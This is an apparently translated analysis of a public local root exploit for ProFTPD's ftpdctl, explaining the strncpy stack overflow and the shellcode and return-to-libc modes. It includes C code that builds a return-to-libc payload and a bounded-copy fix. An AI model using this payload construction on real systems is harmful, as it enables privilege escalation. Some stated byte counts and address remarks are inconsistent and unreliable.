ProFTPD local pr_ctrls_connect vulnerability (ftpdctl): vulnerability and attack code analysis

Source: Internet
Author: User

Attack Code URL: http://www.exploit-db.com/exploits/394/


1. Test environment:
1.1 ProFTPD 1.3.0/1.3.0a
1.2 proftpd must be built with the --enable-ctrls option:
./configure --enable-ctrls
2. Running the exploit:
# gcc 394.c -o 394
# ./394 -s <option> [-p <option_path>] [-o <option_offset>]
The value after -s selects one of two attack modes, 1 or 2. Mode 1 uses the current environment (the shellcode is placed in the environment block); mode 2 uses the return-to-libc technique.


Note: in a return-to-libc attack, the saved return address on the stack is overwritten with the address of an existing function (typically one in libc), and the part of the stack above it is overwritten with that function's arguments. The attacker can thus call existing code without injecting any code of their own, which also works when the stack is not executable.
The -o and -p parameters are not essential to the attack, but they make the attack code easier to use: they override the offset and the path of the target program instead of relying on the built-in defaults.
3. Code Analysis
The command used to run the code is: # ./394 -s 1
3.1 Analysis of the program parameters

Line 236 of the program parses the command-line arguments given to 394.c, using getopt(int argc, char * const argv[], const char *optstring).

argc and argv are the argument count and argument vector passed to main(); optstring is the option string describing the options to handle.

A letter in the option string followed by a colon ":" takes an argument, and the global variable optarg points to that argument. The program then handles each option in turn. Since -s is the only option that actually affects the attack, the analysis below focuses on -s.
When getopt reaches -s, because the option string contains "s:" (the letter followed by a colon), optarg points to the argument following -s, which is 1.

On line 246 the program stores this value in the variable wybor and leaves it for the later steps.


3.2 Checking the validity of the parameters
Because 394.c provides only two ways of exploiting the vulnerability, line 241 restricts -s to 1 or 2. Any other value is treated as invalid and makes the program exit immediately.



The program also has a variable path holding the absolute path of the vulnerable program, which defaults to /usr/local/bin/ftpdctl. ProFTPD's ftpdctl calls pr_ctrls_connect() in ctrls.c, and a strncpy() inside that function is the buffer overflow point of this vulnerability.

On line 267 of 394.c the program opens the file with fopen() to check that a file exists at that path and can be opened; this is only an existence check, not a check that the binary is actually vulnerable.



3.3 Constructing the overflow data and running the attack
The attack itself is launched on lines 298 and 324 with execle(path, path, "-s", buf, 0, sh);
int execle(const char *path, const char *arg, ..., char * const envp[]);
execle() replaces the current process image with a new one. The path parameter is the program to start, including its path; the variadic arg list is the argument vector of the new program, which by convention starts with the command name and is terminated by a null pointer (the 0 above).

The final parameter envp[] is the environment passed to the new process, here the array sh.
The variable buf holds the overflow data. Apart from a large amount of filler, the important part is the return address that redirects execution to a shell. When the buffer overflows, that value overwrites the saved return address, the program jumps to /bin/sh, and arbitrary commands can be run.
The construction of the overflow data involves two variables, buf[229] and sh[2]. Since the argument after -s (1 or 2) selects the exploitation mode, the two modes are described separately:
Mode 1 (wybor=1): apart from the first two bytes "/a", all remaining 227 bytes of buf are filled with the return address that leads to /bin/sh (an address inside the NOP-filled environment, so that execution slides into the shellcode).


envp[] is filled with 0x90 (NOP) bytes, with the pre-built shellcode written at the end. The shellcode runs setuid(0), setgid(0), /bin/sh and exit(0).

Mode 2 (wybor=2) uses return-to-libc. Here the first byte of buf is '/', and the last three 4-byte words are, in order, the address of libc's system(), the address that system() will return into (libc_next in the exploit) and the address of the string "/bin/sh"; the remaining bytes (225 according to the original) are 0x41 ('A') padding.

envp[] is again used as filler, with the string "/bin/sh" written at its end, which is what the third address in buf points to.
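As an added example (not code from 394.c or from ProFTPD), the following C function builds an argument in the mode 2 layout just described: a '/' first byte, 0x41 filler up to the saved return address, then the addresses of system(), of the function system() returns into, and of the "/bin/sh" string. The distance to the saved return address (pad) and the three addresses are properties of the target and are passed in rather than hard-coded; a 32-bit little-endian x86 target is an assumption. A second function checks the payload for embedded NUL bytes, because both the argv string handed to execle() and the strlen()-bounded strncpy() in ctrls.c stop at the first NUL, so an address containing a zero byte silently truncates everything after it.

```c
/* Added example: builds a return-to-libc argument in the mode 2 layout the
 * text describes. Not the exploit's own code; pad and the three addresses
 * depend on the target and are supplied by the caller. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumption: 32-bit x86 target, so every address is a 4-byte little-endian word. */
typedef uint32_t addr32;

/* Layout of the argument as it lands in ctrl_sock.sun_path and beyond:
 *   out[0]            '/'        keeps the argument an absolute path
 *   out[1..pad)       0x41       filler up to the saved return address
 *   out[pad]          system     overwrites the saved EIP of pr_ctrls_connect()
 *   out[pad+4]        exit       where system() returns (the exploit's libc_next)
 *   out[pad+8]        "/bin/sh"  pointer to the string placed in the environment
 * pad is the distance from the start of sun_path to the saved return address.
 * Returns the payload length, or 0 if it does not fit in out together with
 * the terminating NUL that an argv string needs. */
size_t build_ret2libc_arg(unsigned char *out, size_t out_len, size_t pad,
                          addr32 system_addr, addr32 exit_addr, addr32 binsh_addr)
{
    size_t total = pad + 3 * sizeof(addr32);
    if (pad < 1 || total + 1 > out_len)
        return 0;

    memset(out, 0x41, pad);
    out[0] = '/';

    addr32 words[3] = { system_addr, exit_addr, binsh_addr };
    size_t off = pad;
    for (int i = 0; i < 3; i++)
        for (int b = 0; b < 4; b++)           /* little-endian store, host-independent */
            out[off++] = (unsigned char)(words[i] >> (8 * b));
    out[off] = '\0';
    return total;
}

/* The argument travels as an argv string and is then copied with
 * strncpy(dst, src, strlen(src)); both stop at the first NUL byte, so a
 * zero byte inside any address cuts the payload short.
 * Returns the index of the first embedded NUL, or -1 if there is none. */
long first_embedded_nul(const unsigned char *payload, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (payload[i] == 0)
            return (long)i;
    return -1;
}

int main(void)
{
    unsigned char buf[64];
    /* placeholder addresses for illustration; real ones come from the target's libc */
    size_t n = build_ret2libc_arg(buf, sizeof buf, 12, 0x41424344u, 0x45464748u, 0x494a4b4cu);
    printf("%zu-byte payload, first embedded NUL at %ld\n", n, first_embedded_nul(buf, n));
    return 0;
}
```

The addresses in main() are placeholders; on a real target they come from the loaded libc and the environment layout. A libc mapped at an address such as 0x08048000-style ranges with a zero low byte cannot be used this way at all, which is one reason the exploit puts "/bin/sh" in the environment rather than inside buf.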



4. Analysis Results
From the analysis above, 394.c attacks the vulnerability simply by invoking ProFTPD's ftpdctl command with -s. ftpdctl has to establish a local socket connection to the server for inter-process communication, and to do so ftpdctl.c calls pr_ctrls_connect(char *socket_file), defined at line 874 of ctrls.c.
pr_ctrls_connect(char *socket_file) creates an AF_UNIX stream socket and connects it to the server. The local socket address used for the connection is ctrl_sock, a struct sockaddr_un with two members: sun_family and sun_path.

sun_family is the address family and is set to AF_UNIX for local inter-process communication. sun_path is the filesystem path of the socket, and the program fills it from socket_file.

Unfortunately, that copy is done with strncpy() without checking the bounds of the destination. Line 923 of the program reads strncpy(ctrl_sock.sun_path, socket_file, strlen(socket_file)): the length limit is the length of the source string rather than the size of sun_path, so the call is effectively a strcpy() and performs no bounds check on the data being written (the same call also never copies the terminating NUL). Data of arbitrary length can therefore be written into a fixed-size field of ctrl_sock (sun_path is 108 bytes on Linux).

ctrl_sock is a local variable of pr_ctrls_connect(), so it is allocated on the stack for the duration of the call. The same stack also holds the saved registers and the function's return address, which is what makes a stack buffer overflow exploitable. As the comment in the 394.c source says, the buffer can be overflowed by controlling the length of socket_file.
394.c exploits exactly this: it builds an over-long argument containing the return address(es) leading to /bin/sh and passes it with -s in place of the normal socket_file path when invoking ftpdctl. When ctrls.c runs strncpy(), the over-long data overflows the buffer and overwrites the saved return address, so execution is redirected to /bin/sh and the attack succeeds.
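The strncpy() problem above, as an added example that is neither ProFTPD's nor the exploit's code: the first function repeats the original copy into a struct sockaddr_un placed at the start of a heap region with spare room behind it, so the number of bytes written past the structure can be measured instead of corrupting a stack frame, and the second shows the bounded copy the function should have used (reject anything that does not fit together with its terminator). The sample path lengths are constructed; the code uses sizeof(sun_path) rather than the 108-byte glibc constant, so it is also correct on systems with a different size.

```c
/* Added example: reproduces the pattern from ctrls.c,
 *   strncpy(ctrl_sock.sun_path, socket_file, strlen(socket_file));
 * against a heap region large enough to absorb the overrun, so the amount
 * written past the structure can be measured, and shows a bounded
 * replacement. Not ProFTPD's own code. */
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>

/* Constructed socket path of exactly n characters: "/" followed by 'A's. */
char *make_socket_path(size_t n)
{
    char *p = malloc(n + 1);
    if (!p)
        return NULL;
    memset(p, 'A', n);
    if (n > 0)
        p[0] = '/';
    p[n] = '\0';
    return p;
}

/* Number of bytes the original copy writes beyond the end of ctrl_sock.
 * A struct sockaddr_un is placed at the start of a malloc'd region whose
 * tail is filled with 0xCC; the copy stays inside that one allocation, so
 * the overrun is observable rather than undefined behaviour. */
size_t ctrls_connect_overrun(const char *socket_file)
{
    size_t len = strlen(socket_file);
    size_t room = sizeof(struct sockaddr_un) + len + 1;
    unsigned char *region = malloc(room);
    if (!region)
        return 0;
    memset(region, 0xCC, room);

    struct sockaddr_un *ctrl_sock = (struct sockaddr_un *)region;
    memset(ctrl_sock, 0, sizeof(*ctrl_sock));
    ctrl_sock->sun_family = AF_UNIX;

    /* The vulnerable copy. dst is ctrl_sock->sun_path; the bound is
     * strlen(src), so nothing limits the write to sizeof(sun_path), and
     * because n == strlen(src) no terminating NUL is copied either. */
    char *dst = (char *)region + offsetof(struct sockaddr_un, sun_path);
    strncpy(dst, socket_file, strlen(socket_file));

    size_t overrun = 0;
    for (size_t i = sizeof(struct sockaddr_un); i < room; i++)
        if (region[i] != 0xCC)
            overrun++;
    free(region);
    return overrun;
}

/* Bounded replacement: reject anything that does not fit together with
 * its terminator, and copy the NUL explicitly instead of relying on memset. */
int set_sun_path(struct sockaddr_un *sa, const char *socket_file)
{
    size_t len = strlen(socket_file);
    if (len >= sizeof(sa->sun_path)) {
        errno = ENAMETOOLONG;
        return -1;
    }
    memset(sa, 0, sizeof(*sa));
    sa->sun_family = AF_UNIX;
    memcpy(sa->sun_path, socket_file, len + 1);
    return 0;
}

int main(void)
{
    struct sockaddr_un sa;
    char *longpath = make_socket_path(300);
    printf("sun_path holds %zu bytes\n", sizeof(sa.sun_path));
    printf("original copy of a 300-byte path overruns by %zu bytes\n",
           ctrls_connect_overrun(longpath));
    printf("bounded copy of the same path returns %d\n", set_sun_path(&sa, longpath));
    free(longpath);
    return 0;
}
```

Compiled stand-alone it reports an overrun of 300 minus sizeof(sun_path) bytes for the original copy and -1 (ENAMETOOLONG) for the bounded one. The same check belongs in any code that builds a sockaddr_un from an attacker-influenced string: the kernel will not see a path longer than sun_path, so there is never a reason to copy more.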
